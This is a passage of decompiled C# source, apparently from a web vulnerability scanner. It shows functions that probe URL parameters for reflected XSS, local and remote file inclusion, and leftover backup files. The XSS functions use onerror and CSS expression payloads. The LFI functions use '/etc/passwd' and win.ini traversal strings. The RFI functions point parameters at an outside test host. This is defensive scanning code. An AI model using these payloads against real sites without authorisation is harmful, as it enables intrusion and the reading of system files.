							text11 = text5 + text + text6 + text2 + "=" + text9 + text3;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS20 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InStyleProperty, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS20);
								delegateLog("Found XSS Vuln: " + vulnXSS20.vulnActionUrl);
								continue;
							}
						}
						if (Regex.IsMatch(sourceCodeByReplaceCsrfCode, "(?<=\\:\\s*)" + text4 + "(?=[;|\\}])", (RegexOptions)1))
						{
							text8 = GenerateRandomIntegerString();
							text9 = "aa; width:expression('alert(" + text8 + ")'); aa: ";
							text10 = text9;
							text11 = text5 + text + text6 + text2 + "=" + text9 + text3;
							text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
							if (IsIncludeTargetScript(text12, text10))
							{
								VulnXSS vulnXSS21 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InStylePropertyValue, reqType.ToString() + " XSS Reflected", EscapeCookie);
								list.Add(vulnXSS21);
								delegateLog("Found XSS Vuln: " + vulnXSS21.vulnActionUrl);
								continue;
							}
						}
					}
					text8 = GenerateRandomIntegerString();
					text9 = "<img src=0 onerror=\"alert(" + text8 + ")\">";
					text10 = text9;
					text11 = text5 + text + text6 + array2[i] + text9;
					text12 = GetSourceCodeByReplaceCsrfCode(text11, reqType, isDetectCsrf, webForm);
					if (IsIncludeTargetScript(text12, text10) && !IsIncludeTargetScript(text12, text10 + "'") && !IsIncludeTargetScript(text12, text10 + "\""))
					{
						VulnXSS vulnXSS22 = new VulnXSS(reqType, referUrl, text11, text2, XSSType.InHTML, reqType.ToString() + " XSS Reflected", EscapeCookie);
						list.Add(vulnXSS22);
						delegateLog("Found XSS Vuln: " + vulnXSS22.vulnActionUrl);
					}
				}
				DebugLog("End Check XSS Vuln: " + sURL);
				return list.ToArray();
			}
			catch (Exception)
			{
				return list.ToArray();
			}
		}

		public VulnLFI[] GetLFIVulnCollection(string sURL, RequestType reqType, bool isSkipScanned, bool isDetectCsrf, WebForm webForm)
		{
			List<VulnLFI> list = new List<VulnLFI>();
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return list.ToArray();
				}
				GetSourceCodeByReplaceCsrfCode(sURL, reqType, isDetectCsrf, webForm);
				string referUrl = sURL;
				if (webForm != null)
				{
					referUrl = webForm.refUrl;
				}
				string text = "?";
				string[] array;
				if (reqType == RequestType.GET)
				{
					array = sURL.Split(new char[1]
					{
						'?'
					});
				}
				else
				{
					array = sURL.Split(new char[1]
					{
						'^'
					});
					text = "^";
				}
				if (array.Length < 2)
				{
					return list.ToArray();
				}
				if (string.IsNullOrEmpty(array[1]))
				{
					return list.ToArray();
				}
				string[] array2 = array[1].Split(new char[1]
				{
					'&'
				});
				for (int i = 0; i < array2.Length; i++)
				{
					string[] array3 = array2[i].Split(new char[1]
					{
						'='
					});
					string text2 = array3[0];
					if (text2.IndexOf("csrf", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("token", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("session", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("submit", StringComparison.OrdinalIgnoreCase) >= 0)
					{
						continue;
					}
					string text3 = array3[1];
					if (!IsPotentialFileName(text3))
					{
						continue;
					}
					string text4 = array[0];
					string text5 = "";
					for (int j = 0; j < i; j++)
					{
						if (!string.IsNullOrEmpty(text5))
						{
							text5 += "&";
						}
						text5 += array2[j];
					}
					for (int k = i + 1; k < array2.Length; k++)
					{
						if (!string.IsNullOrEmpty(text5))
						{
							text5 += "&";
						}
						text5 += array2[k];
					}
					string text6 = URL2NoParaURL(sURL) + "^" + text2.ToLower() + "^LFI";
					if (isSkipScanned && IsScannedParameter(text6))
					{
						continue;
					}
					AddScannedParameter(text6);
					if (!string.IsNullOrEmpty(text5))
					{
						text5 += "&";
					}
					string text7 = "";
					string text8 = "";
					string text9 = "";
					string text10 = "";
					if (osType == 0 || osType == 1)
					{
						if (text3.IndexOf("file:") < 0)
						{
							text7 = text4 + text + text5 + text2 + "=/etc/passwd%00";
							text9 = GetSourceCodeByReplaceCsrfCode(text7, reqType, isDetectCsrf, webForm);
							if (text9.IndexOf(":root:") > 0)
							{
								VulnLFI vulnLFI = new VulnLFI(reqType, text7, referUrl, text2, "LFI (Local File Inclusion)");
								list.Add(vulnLFI);
								delegateLog("Found LFI Vuln: " + vulnLFI.vulnActionUrl);
								osType = 1;
								continue;
							}
							text7 = text4 + text + text5 + text2 + "=\\etc\\passwd%00";
							text9 = GetSourceCodeByReplaceCsrfCode(text7, reqType, isDetectCsrf, webForm);
							if (text9.IndexOf(":root:") > 0)
							{
								VulnLFI vulnLFI2 = new VulnLFI(reqType, text7, referUrl, text2, "LFI (Local File Inclusion)");
								list.Add(vulnLFI2);
								delegateLog("Found LFI Vuln: " + vulnLFI2.vulnActionUrl);
								osType = 1;
								continue;
							}
						}
						text7 = text4 + text + text5 + text2 + "=file:///etc/passwd%00";
						text9 = GetSourceCodeByReplaceCsrfCode(text7, reqType, isDetectCsrf, webForm);
						if (text9.IndexOf(":root:") > 0)
						{
							VulnLFI vulnLFI3 = new VulnLFI(reqType, text7, referUrl, text2, "LFI (Local File Inclusion)");
							list.Add(vulnLFI3);
							delegateLog("Found LFI Vuln: " + vulnLFI3.vulnActionUrl);
							osType = 1;
							continue;
						}
					}
					if (osType == 0 || osType == 2)
					{
						if (text3.IndexOf("file:") < 0)
						{
							text8 = text4 + text + text5 + text2 + "=C:/Windows/win.ini";
							text10 = GetSourceCodeByReplaceCsrfCode(text8, reqType, isDetectCsrf, webForm);
							if (text10.IndexOf("for 16-bit app support") >= 0)
							{
								VulnLFI vulnLFI4 = new VulnLFI(reqType, text8, referUrl, text2, "LFI (Local File Inclusion)");
								list.Add(vulnLFI4);
								delegateLog("Found LFI Vuln: " + vulnLFI4.vulnActionUrl);
								osType = 2;
								continue;
							}
							text8 = text4 + text + text5 + text2 + "=C:\\Windows\\win.ini";
							text10 = GetSourceCodeByReplaceCsrfCode(text8, reqType, isDetectCsrf, webForm);
							if (text10.IndexOf("for 16-bit app support") >= 0)
							{
								VulnLFI vulnLFI5 = new VulnLFI(reqType, text8, referUrl, text2, "LFI (Local File Inclusion)");
								list.Add(vulnLFI5);
								delegateLog("Found LFI Vuln: " + vulnLFI5.vulnActionUrl);
								osType = 2;
								continue;
							}
						}
						text8 = text4 + text + text5 + text2 + "=file:///C:/Windows/win.ini";
						text10 = GetSourceCodeByReplaceCsrfCode(text8, reqType, isDetectCsrf, webForm);
						if (text10.IndexOf("for 16-bit app support") >= 0)
						{
							VulnLFI vulnLFI6 = new VulnLFI(reqType, text8, referUrl, text2, "LFI (Local File Inclusion)");
							list.Add(vulnLFI6);
							delegateLog("Found LFI Vuln: " + vulnLFI6.vulnActionUrl);
							osType = 2;
							continue;
						}
					}
					string text11 = "";
					bool flag = false;
					if (osType == 0 || osType == 1)
					{
						text11 = "";
						for (int l = 0; l < 32; l++)
						{
							text7 = text4 + text + text5 + text2 + "=" + text11 + "../etc/passwd%00";
							text9 = GetSourceCodeByReplaceCsrfCode(text7, reqType, isDetectCsrf, webForm);
							if (text9.IndexOf(":root:") >= 0)
							{
								VulnLFI vulnLFI7 = new VulnLFI(reqType, text7, referUrl, text2, "LFI (Local File Inclusion)");
								list.Add(vulnLFI7);
								delegateLog("Found LFI Vuln: " + vulnLFI7.vulnActionUrl);
								osType = 1;
								flag = true;
								break;
							}
							text11 += "../";
						}
						if (flag)
						{
							continue;
						}
					}
					if (osType == 0 || osType == 2)
					{
						text11 = "";
						for (int m = 0; m < 32; m++)
						{
							text7 = text4 + text + text5 + text2 + "=" + text11 + "../windows/win.ini";
							text9 = GetSourceCodeByReplaceCsrfCode(text7, reqType, isDetectCsrf, webForm);
							if (text9.IndexOf("for 16-bit app support") >= 0)
							{
								VulnLFI vulnLFI8 = new VulnLFI(reqType, text7, referUrl, text2, "LFI (Local File Inclusion)");
								list.Add(vulnLFI8);
								delegateLog("Found LFI Vuln: " + vulnLFI8.vulnActionUrl);
								osType = 2;
								flag = true;
								break;
							}
							text11 += "../";
						}
						if (flag)
						{
							continue;
						}
					}
					string fileExt = GetFileExt(sURL);
					if (!fileExt.Equals(".jsp") && !fileExt.Equals(".do"))
					{
						continue;
					}
					text11 = "";
					for (int n = 0; n < 16; n++)
					{
						text7 = text4 + text + text5 + text2 + "=" + text11 + "WEB-INF/web.xml";
						text9 = GetSourceCodeByReplaceCsrfCode(text7, reqType, isDetectCsrf, webForm);
						if (text9.IndexOf("<?xml") >= 0)
						{
							VulnLFI vulnLFI9 = new VulnLFI(reqType, text7, referUrl, text2, "LFI (Local File Inclusion)");
							list.Add(vulnLFI9);
							delegateLog("Found LFI Vuln: " + vulnLFI9.vulnActionUrl);
							flag = true;
							break;
						}
						text11 += "../";
					}
					if (flag)
					{
						continue;
					}
					text11 = "";
					for (int num = 0; num < 16; num++)
					{
						text7 = text4 + text + text5 + text2 + "=" + text11 + "WEB-INF\\web.xml";
						text9 = GetSourceCodeByReplaceCsrfCode(text7, reqType, isDetectCsrf, webForm);
						if (text9.IndexOf("<?xml") >= 0)
						{
							VulnLFI vulnLFI10 = new VulnLFI(reqType, text7, referUrl, text2, "LFI (Local File Inclusion)");
							list.Add(vulnLFI10);
							delegateLog("Found LFI Vuln: " + vulnLFI10.vulnActionUrl);
							flag = true;
							break;
						}
						text11 += "..\\";
					}
				}
				return list.ToArray();
			}
			catch (Exception)
			{
				return list.ToArray();
			}
		}

		private bool IsPotentialFileName(string currentParamValue)
		{
			if (string.IsNullOrEmpty(currentParamValue))
			{
				return true;
			}
			if (Regex.IsMatch(currentParamValue, "^(file:/|[c-z]:|/)", (RegexOptions)1))
			{
				return true;
			}
			if (Regex.IsMatch(currentParamValue, "\\.\\w{1,4}$", (RegexOptions)1))
			{
				return true;
			}
			if (Regex.IsMatch(currentParamValue, "\\d{7}$", (RegexOptions)1))
			{
				return true;
			}
			return false;
		}

		private bool IsPotentialUserName(string currentParamValue)
		{
			if (Regex.IsMatch(currentParamValue, "(user|name|uid|userid)", (RegexOptions)1))
			{
				return true;
			}
			return false;
		}

		public Vulnerability[] GetRFIVulnCollection(string sURL, RequestType reqType, bool isSkipScanned, bool isDetectCsrf, WebForm webForm)
		{
			List<Vulnerability> list = new List<Vulnerability>();
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return list.ToArray();
				}
				GetSourceCodeByReplaceCsrfCode(sURL, reqType, isDetectCsrf, webForm);
				string referUrl = sURL;
				if (webForm != null)
				{
					referUrl = webForm.refUrl;
				}
				string text = "?";
				string[] array;
				if (reqType == RequestType.GET)
				{
					array = sURL.Split(new char[1]
					{
						'?'
					});
				}
				else
				{
					array = sURL.Split(new char[1]
					{
						'^'
					});
					text = "^";
				}
				if (array.Length < 2)
				{
					return list.ToArray();
				}
				if (string.IsNullOrEmpty(array[1]))
				{
					return list.ToArray();
				}
				string[] array2 = array[1].Split(new char[1]
				{
					'&'
				});
				for (int i = 0; i < array2.Length; i++)
				{
					string[] array3 = array2[i].Split(new char[1]
					{
						'='
					});
					string text2 = array3[0];
					if (text2.IndexOf("csrf", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("token", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("session", StringComparison.OrdinalIgnoreCase) >= 0 || text2.IndexOf("submit", StringComparison.OrdinalIgnoreCase) >= 0)
					{
						continue;
					}
					string currentParamValue = array3[1];
					if (!IsPotentialFileName(currentParamValue))
					{
						continue;
					}
					string text3 = array[0];
					string text4 = "";
					for (int j = 0; j < i; j++)
					{
						if (!string.IsNullOrEmpty(text4))
						{
							text4 += "&";
						}
						text4 += array2[j];
					}
					for (int k = i + 1; k < array2.Length; k++)
					{
						if (!string.IsNullOrEmpty(text4))
						{
							text4 += "&";
						}
						text4 += array2[k];
					}
					string text5 = URL2NoParaURL(sURL) + "^" + text2.ToLower() + "^RFI";
					if (isSkipScanned && IsScannedParameter(text5))
					{
						continue;
					}
					AddScannedParameter(text5);
					if (!string.IsNullOrEmpty(text4))
					{
						text4 += "&";
					}
					string text6 = "";
					string text7 = "";
					string text8 = "http://vulnweb.janusec.com/rfi.ini";
					string value = "[WebCruiserWVSRFITESTOK]";
					text6 = text3 + text + text4 + text2 + "=" + text8;
					text7 = GetSourceCodeAndResponseUrlByReplaceCsrfCode(text6, reqType, isDetectCsrf, webForm, out var responseUrl);
					if (responseUrl.Equals(text8, StringComparison.OrdinalIgnoreCase))
					{
						VulnRedirect vulnRedirect = new VulnRedirect(reqType, text6, referUrl, text2, "Redirect(302)");
						list.Add(vulnRedirect);
						delegateLog("Found Redirect Vuln: " + vulnRedirect.vulnActionUrl);
						continue;
					}
					if (responseUrl.Equals(URL2ActualURL(text6), StringComparison.OrdinalIgnoreCase))
					{
						if (text7.IndexOf(value) >= 0)
						{
							VulnRFI vulnRFI = new VulnRFI(reqType, text6, referUrl, text2, "RFI(Remote File Inclusion)");
							list.Add(vulnRFI);
							delegateLog("Found RFI Vuln: " + vulnRFI.vulnActionUrl);
							continue;
						}
						if (!Regex.IsMatch(text7, "(?<=//(?:(?!\\*/)[^\\r\\n])+)" + text8, (RegexOptions)1) && !Regex.IsMatch(text7, "(?<=/\\*(?:(?!\\*/)[\\s\\S])+)" + text8, (RegexOptions)1) && Regex.IsMatch(text7, "(?<=(onclick|onload|onerror|onmouse|onfocus|onsubmit|onselect|javascript:|<script.*>)[^>]+)http://vulnweb.janusec.com/rfi.ini[\\x22\\x27]", (RegexOptions)1) && Regex.IsMatch(text7, "(?<=window.location.replace\\([\\x22\\x27])http://vulnweb.janusec.com/rfi.ini(?=[\\x22\\x27])", (RegexOptions)1))
						{
							VulnRedirect vulnRedirect2 = new VulnRedirect(reqType, text6, referUrl, text2, "Redirect(Script)");
							list.Add(vulnRedirect2);
							delegateLog("Found Redirect Vuln: " + vulnRedirect2.vulnActionUrl);
							continue;
						}
					}
					text8 = "vulnweb.janusec.com/rfi.ini";
					text6 = text3 + text + text4 + text2 + "=" + text8;
					text7 = GetSourceCodeAndResponseUrlByReplaceCsrfCode(text6, reqType, isDetectCsrf, webForm, out responseUrl);
					if (responseUrl.Equals("http://" + text8, StringComparison.OrdinalIgnoreCase))
					{
						VulnRedirect vulnRedirect3 = new VulnRedirect(reqType, text6, referUrl, text2, "Redirect(302)");
						list.Add(vulnRedirect3);
						delegateLog("Found Redirect Vuln: " + vulnRedirect3.vulnActionUrl);
						continue;
					}
					if (responseUrl.Equals(URL2ActualURL(text6), StringComparison.OrdinalIgnoreCase))
					{
						if (text7.IndexOf(value) >= 0)
						{
							VulnRFI vulnRFI2 = new VulnRFI(reqType, text6, referUrl, text2, "RFI(Remote File Inclusion)");
							list.Add(vulnRFI2);
							delegateLog("Found RFI Vuln: " + vulnRFI2.vulnActionUrl);
							continue;
						}
						text8 = "http://vulnweb.janusec.com/rfi.ini";
						if (!Regex.IsMatch(text7, "(?<=//(?:(?!\\*/)[^\\r\\n])+)" + text8, (RegexOptions)1) && !Regex.IsMatch(text7, "(?<=/\\*(?:(?!\\*/)[\\s\\S])+)" + text8, (RegexOptions)1) && Regex.IsMatch(text7, "(?<=(onclick|onload|onerror|onmouse|onfocus|onsubmit|onselect|javascript:|<script.*>)[^>]+)http://vulnweb.janusec.com/rfi.ini[\\x22\\x27]", (RegexOptions)1) && Regex.IsMatch(text7, "(?<=window.location.replace\\([\\x22\\x27])http://vulnweb.janusec.com/rfi.ini(?=[\\x22\\x27])", (RegexOptions)1))
						{
							VulnRedirect vulnRedirect4 = new VulnRedirect(reqType, text6, referUrl, text2, "Redirect(Script)");
							list.Add(vulnRedirect4);
							delegateLog("Found Redirect Vuln: " + vulnRedirect4.vulnActionUrl);
							continue;
						}
					}
					text8 = "hTTp://vulnweb.janusec.com/rfi.ini";
					text6 = text3 + text + text4 + text2 + "=" + text8;
					text7 = GetSourceCodeAndResponseUrlByReplaceCsrfCode(text6, reqType, isDetectCsrf, webForm, out responseUrl);
					if (responseUrl.Equals(text8, StringComparison.OrdinalIgnoreCase))
					{
						VulnRedirect vulnRedirect5 = new VulnRedirect(reqType, text6, referUrl, text2, "Redirect(302)");
						list.Add(vulnRedirect5);
						delegateLog("Found Redirect Vuln: " + vulnRedirect5.vulnActionUrl);
					}
					else
					{
						if (!responseUrl.Equals(URL2ActualURL(text6), StringComparison.OrdinalIgnoreCase))
						{
							continue;
						}
						if (text7.IndexOf(value) >= 0)
						{
							VulnRFI vulnRFI3 = new VulnRFI(reqType, text6, referUrl, text2, "RFI(Remote File Inclusion)");
							list.Add(vulnRFI3);
							delegateLog("Found RFI Vuln: " + vulnRFI3.vulnActionUrl);
							continue;
						}
						text8 = "http://vulnweb.janusec.com/rfi.ini";
						if (!Regex.IsMatch(text7, "(?<=//(?:(?!\\*/)[^\\r\\n])+)" + text8, (RegexOptions)1) && !Regex.IsMatch(text7, "(?<=/\\*(?:(?!\\*/)[\\s\\S])+)" + text8, (RegexOptions)1) && Regex.IsMatch(text7, "(?<=(onclick|onload|onerror|onmouse|onfocus|onsubmit|onselect|javascript:|<script.*>)[^>]+)" + text8 + "[\"']", (RegexOptions)1) && Regex.IsMatch(text7, "(?<=window.location.replace\\([\\x22\\x27])http://vulnweb.janusec.com/rfi.ini(?=[\\x22\\x27])", (RegexOptions)1))
						{
							VulnRedirect vulnRedirect6 = new VulnRedirect(reqType, text6, referUrl, text2, "Redirect(Script)");
							list.Add(vulnRedirect6);
							delegateLog("Found Redirect Vuln: " + vulnRedirect6.vulnActionUrl);
						}
					}
				}
				return list.ToArray();
			}
			catch (Exception)
			{
				return list.ToArray();
			}
		}

		public VulnBackup[] GetBackupVulnCollection(string sURL, bool isSkipScanned)
		{
			List<VulnBackup> list = new List<VulnBackup>();
			try
			{
				if (CurrentStatus == TaskStatus.Stop)
				{
					return list.ToArray();
				}
				string text = URL2NoParaURL(sURL);
				string text2 = text + "^^BACKUP";
				if (isSkipScanned && IsScannedParameter(text2))
				{
					return list.ToArray();
				}
				AddScannedParameter(text2);
				string text3 = "";
				if (text.EndsWith("/"))
				{
					string value = ((Capture)Regex.Match(text, "(?<=/)[^/]+(?=/$)")).get_Value();
					string[] array = new string[16]
					{
						".7z",
						".zip",
						".rar",
						".wim",
						".war",
						".ear",
						".jar",
						".tar",
						".ar",
						".cbz",
						".exe",
						".tar.bz2",
						".tar.gz",
						".tar.lzma",
						".tar.7z",
						".tar.xz"
					};
					if (value.IndexOf(DomainHost) >= 0)
					{
						string[] array2 = array;
						foreach (string str in array2)
						{
							text3 = text + DomainHost + str;
							if (IsExistedResource(text3))
							{
								VulnBackup item = new VulnBackup(text3, text);
								list.Add(item);
								delegateLog("Found obsolete backup file: " + text3);
							}
						}
						return list.ToArray();
					}
					string str2 = text.Replace(value + "/", "");
					string[] array3 = new string[3]
					{
						value + " (copy)/",
						value + " - Copy/",
						"Copy of " + value + "/"
					};
					string[] array4 = array3;
					foreach (string str3 in array4)
					{
						text3 = str2 + str3;
						if (IsExistedResource(text3))
						{
							VulnBackup item2 = new VulnBackup(text3, text);
							list.Add(item2);
							delegateLog("Found obsolete backup file: " + text3);
						}
					}
					if (value.Equals("WEB-INF", StringComparison.OrdinalIgnoreCase))
					{
						string[] array5 = new string[3]
						{
							"WEB-INF (copy)/web.xml",
							"WEB-INF - Copy/web.xml",
							"Copy of WEB-INF/web.xml"
						};
						string[] array6 = array5;
						foreach (string str4 in array6)
						{
							text3 = str2 + str4;
							string sourceCode = GetSourceCode(text3, RequestType.GET, "");
							if (sourceCode.IndexOf("<?xml ") >= 0)
							{
								VulnBackup item3 = new VulnBackup(text3, text);
								list.Add(item3);
								delegateLog("Found obsolete backup file: " + text3);
							}
						}
					}
					string[] array7 = array;
					foreach (string str5 in array7)
					{
						text3 = str2 + value + str5;
						if (IsExistedResource(text3))
						{
							VulnBackup item4 = new VulnBackup(text3, text);
							list.Add(item4);
							delegateLog("Found obsolete backup file: " + text3);
						}
					}
					return list.ToArray();
				}
				if (!IsExistedResource(text))
				{
					return list.ToArray();
				}
				string pathFromURL = GetPathFromURL(text);
				string text4 = text.Substring(pathFromURL.Length);
				string fileExt = GetFileExt(text);
				string sURL2 = pathFromURL + "notexistedfilewcrtest" + GenerateRandomIntegerString() + ".txt";
				if (IsExistedResource(sURL2))
				{
					return list.ToArray();
				}
				string str6 = text4;
				if (!string.IsNullOrEmpty(fileExt))
				{
					str6 = text4.Replace(fileExt, "");
				}
				string[] array8 = new string[12]
				{
					str6 + " (copy)" + fileExt,
					str6 + " (another copy)" + fileExt,
					str6 + " (3rd copy)" + fileExt,
					str6 + " (third copy)" + fileExt,
					str6 + " (4th copy)" + fileExt,
					str6 + " - Copy" + fileExt,
					str6 + " - Copy (2)" + fileExt,
					str6 + " - Copy - Copy" + fileExt,
					"Copy of " + text4,
					"Copy (2) of " + text4,
					"Copy of Copy of " + text4,
					text4 + "~"
				};
				string[] array9 = array8;
				foreach (string str7 in array9)
				{
					text3 = pathFromURL + str7;
					if (IsExistedResource(text3))
					{
						VulnBackup item5 = new VulnBackup(text3, text);
						list.Add(item5);
						delegateLog("Found obsolete backup file: " + text3);
					}
				}
				List<string> list2 = new List<string>();
				list2.Add(text4 + ".zip");
				list2.Add(text4 + ".7z");
				list2.Add(text4 + ".ar");
				list2.Add(text4 + ".bz2");
				list2.Add(text4 + ".cbz");
				list2.Add(text4 + ".exe");
				list2.Add(text4 + ".gz");
				list2.Add(text4 + ".jar");
				list2.Add(text4 + ".lzma");
				list2.Add(text4 + ".tar");
				list2.Add(text4 + ".tar.7z");
				list2.Add(text4 + ".tar.bz2");
				list2.Add(text4 + ".tar.gz");
				list2.Add(text4 + ".tar.lzma");
				list2.Add(text4 + ".tar.xz");
				list2.Add(text4 + ".xz");
				list2.Add(text4 + ".old");
				list2.Add(text4 + ".bak");
				list2.Add(text4 + ".bac");
				list2.Add(text4 + ".backup");
				list2.Add(text4 + ".1");
				list2.Add(text4 + ".a");
				list2.Add("old_" + text4);
				list2.Add("bak_" + text4);
				list2.Add("backup_" + text4);
				list2.Add(text4 + "_old");
				list2.Add(text4 + "_bak");
				list2.Add(text4 + "_backup");
				list2.Add(text4 + "old");
				list2.Add(text4 + "bak");
				list2.Add(text4 + "inc");
				list2.Add(text4 + "1");
				list2.Add(text4 + "2");
				list2.Add(str6 + ".zip");
				list2.Add(str6 + ".rar");
				list2.Add(str6 + ".wim");
				list2.Add(str6 + ".7z");
				list2.Add(str6 + ".tar");
				list2.Add(str6 + ".old");
				list2.Add(str6 + ".bak");
				list2.Add(str6 + ".bac");
				list2.Add(str6 + ".backup");
				list2.Add(str6 + ".1");
				list2.Add(str6 + ".a");
				list2.Add(str6 + ".inc");
				list2.Add(str6 + ".include");
				list2.Add(str6 + "_old" + fileExt);
				list2.Add(str6 + "_bak" + fileExt);
				list2.Add(str6 + "_backup" + fileExt);
				list2.Add(str6 + "1" + fileExt);
				list2.Add(str6 + "2" + fileExt);
				List<string> list3 = list2;
				if (fileExt.Equals(".jsp"))
				{
					list3.Add(text4 + "f");
					list3.Add(text4 + "x");
					list3.Add(text4 + "a");
				}
				foreach (string item7 in list3)
				{
					text3 = pathFromURL + item7;
					if (IsExistedResource(text3))
					{
						VulnBackup item6 = new VulnBackup(text3, text);
						list.Add(item6);
						delegateLog("Found obsolete backup file: " + text3);
					}
				}
				return list.ToArray();
			}
			catch (Exception)
			{
				return list.ToArray();
			}
		}

		public bool HasScannedURL(string sURL)
		{
			string value = URL2DistinctURL(sURL);
			for (int i = 0; i < ScannedURL.Count; i++)
			{
				if (ScannedURL[i].Equals(value))
				{
					return true;
				}
			}
			return false;
		}

		public bool HasCrawledURL(string sURL)
		{
			string value = URL2DistinctURL(sURL);
			for (int i = 0; i < CrawledURL.Count; i++)
			{
				if (CrawledURL[i].Equals(value))
				{
					return true;
				}
			}
			return false;
		}

		public static string URL2DistinctURL(string sURL)
		{
			//IL_0033: Unknown result type (might be due to invalid IL or missing references)
			//IL_0039: Expected O, but got Unknown
			//IL_016c: Unknown result type (might be due to invalid IL or missing references)
			//IL_0172: Expected O, but got Unknown
			string text = sURL;
			if (sURL.IndexOf('?') < 0 && sURL.IndexOf('^') < 0)
			{
				int num = text.IndexOf('#');
				if (num > 0)
				{
					text = text.Substring(0, num);
				}
			}
			Regex val = new Regex("(?<=/(\\w+-)?)\\d+(-\\d+)?(\\.\\w{1,6}|/)?(\\?.*)?$");
			string value = ((Capture)val.Match(text)).get_Value();
			if (!string.IsNullOrEmpty(value))
			{
				return text.Replace(value, "PSEUDOSTATIC");
			}
			if (sURL.IndexOf('?') > 0)
			{
				string[] array = sURL.Split(new char[1]
				{
					'?'
				});
				text = array[0];
				if (array.Length >= 2)
				{
					string[] array2 = array[1].Split(new char[1]
					{
						'&'
					});
					string[] array3 = array2;
					foreach (string text2 in array3)
					{
						string[] array4 = text2.Split(new char[1]
						{
							'='
						});
						if (array4.Length > 1 && !string.IsNullOrEmpty(array4[1]))
						{
							if (array4[1].IndexOf('#') > 0)
							{
								array4[1] = array4[1].Substring(0, array4[1].IndexOf('#'));
							}
							text = ((!Regex.IsMatch(array4[1], "^\\d+$")) ? (text + "?" + text2) : (text + "?" + array4[0]));
						}
						else
						{
							text = text + "?" + array4[0];
						}
					}
				}
				val = new Regex(",\\d+$", (RegexOptions)16);
				string value2 = ((Capture)val.Match(text)).get_Value();
				if (!string.IsNullOrEmpty(value2))
				{
					text = text.Replace(value2, ",");
				}
			}
			else if (sURL.IndexOf('^') > 0)
			{
				text = Regex.Replace(sURL, "\\d{7}", "DIGITAL");
			}
			return text;
		}

		public static string GetPathFromURL(string sURL)
		{
			string text = "";
			if (sURL.IndexOf('?') < 0)
			{
				return sURL.Substring(0, sURL.LastIndexOf('/') + 1);
			}
			string[] array = sURL.Split(new char[1]
			{
				'?'
			});
			return array[0].Substring(0, array[0].LastIndexOf('/') + 1);
		}

		public static string GetBaseHref(string Source)
		{
			//IL_0007: Unknown result type (might be due to invalid IL or missing references)
			//IL_000d: Expected O, but got Unknown
			Regex val = new Regex("(?<=<base\\s+href=[\\x27\\x22]?)[^\\x27\\x22\\s>]+(?=[\\x27\\x22\\s>]?)", (RegexOptions)17);
			return ((Capture)val.Match(Source)).get_Value();
		}

		public static string GetElementFromInputLine(string Line, string Element)
		{
			//IL_0012: Unknown result type (might be due to invalid IL or missing references)
			//IL_0018: Expected O, but got Unknown
			//IL_003f: Unknown result type (might be due to invalid IL or missing references)
			//IL_0045: Expected O, but got Unknown
			Regex val = new Regex("(?<=" + Element + "\\s*=\\s*[\\x22\\x27])[^\\x22\\x27\\x3e]+?(?=[\\x22\\x27\\x3e])", (RegexOptions)17);
			string value = ((Capture)val.Match(Line)).get_Value();
			if (string.IsNullOrEmpty(value))
			{
				val = new Regex("(?<=" + Element + "=)[^\\x22\\x27\\x3e\\s]+?(?=[\\s\\x3e])", (RegexOptions)17);
				value = ((Capture)val.Match(Line)).get_Value();
			}
			return value;
		}

		public static string GetCompleteURL(string sURL, string Path)
		{
			string text = "";
			if (Path.LastIndexOf('/') < 9)
			{
				Path = Path.Trim() + "/";
			}
			string str = Path.Substring(0, Path.IndexOf("/", 9) + 1);
			if (sURL.IndexOf("http") != 0)
			{
				text = ((sURL.IndexOf('/') != 0) ? (Path + sURL) : (str + sURL.Substring(1)));
			}
			else
			{
				if (sURL.Length <= 8)
				{
					return "";
				}
				text = sURL;
			}
			text = text.Replace("&amp;", "&").Replace("/./", "/");
			while (Regex.IsMatch(text, "/[\\w\\-]+/\\.\\./"))
			{
				text = Regex.Replace(text, "/[\\w\\-]+/\\.\\./", "/");
			}
			if (text.IndexOf('#') > 0)
			{
				text = text.Substring(0, text.IndexOf('#'));
			}
			return text;
		}

		public static string GetSelectNameOptionValue(string FormSource)
		{
			//IL_000d: Unknown result type (might be due to invalid IL or missing references)
			//IL_0013: Expected O, but got Unknown
			//IL_00de: Unknown result type (might be due to invalid IL or missing references)
			//IL_00e4: Expected O, but got Unknown
			string text = "";
			Regex val = new Regex("<select\\s+[^>]+>", (RegexOptions)17);
			MatchCollection val2 = val.Matches(FormSource);
			int[] array = new int[val2.get_Count()];
			for (int i = 0; i < val2.get_Count(); i++)
			{
				string value = ((Capture)val2.get_Item(i)).get_Value();
				if (i == 0)
				{
					array[i] = FormSource.IndexOf(value);
				}
				else
				{
					array[i] = FormSource.IndexOf(value, array[i - 1] + 10);
				}
			}
			for (int j = 0; j < val2.get_Count(); j++)
			{
				string elementFromInputLine = GetElementFromInputLine(((Capture)val2.get_Item(j)).get_Value(), "name");
				if (string.IsNullOrEmpty(elementFromInputLine))
				{
					continue;
				}
				string text2 = "";
				text2 = ((j != val2.get_Count() - 1) ? FormSource.Substring(array[j], array[j + 1] - array[j]) : FormSource.Substring(array[j]));
				val = new Regex("<option\\s+[^>]+>", (RegexOptions)17);
				MatchCollection val3 = val.Matches(text2);
				for (int k = 0; k < val3.get_Count(); k++)
				{
					string elementFromInputLine2 = GetElementFromInputLine(((Capture)val3.get_Item(k)).get_Value(), "value");
					if (!string.IsNullOrEmpty(elementFromInputLine2))
					{
						if (!string.IsNullOrEmpty(text))
						{
							text += "&";
						}
						text = text + elementFromInputLine + "=" + elementFromInputLine2;
						break;
					}
				}
			}
			return text;
		}

		public static bool IsValidLink(string Link)
		{
			if (!Regex.IsMatch(Link, "^[\\w\\/\\\\]"))
			{
				return false;
			}
			if (Link.IndexOf("logout", StringComparison.OrdinalIgnoreCase) >= 0)
			{
				return false;
			}
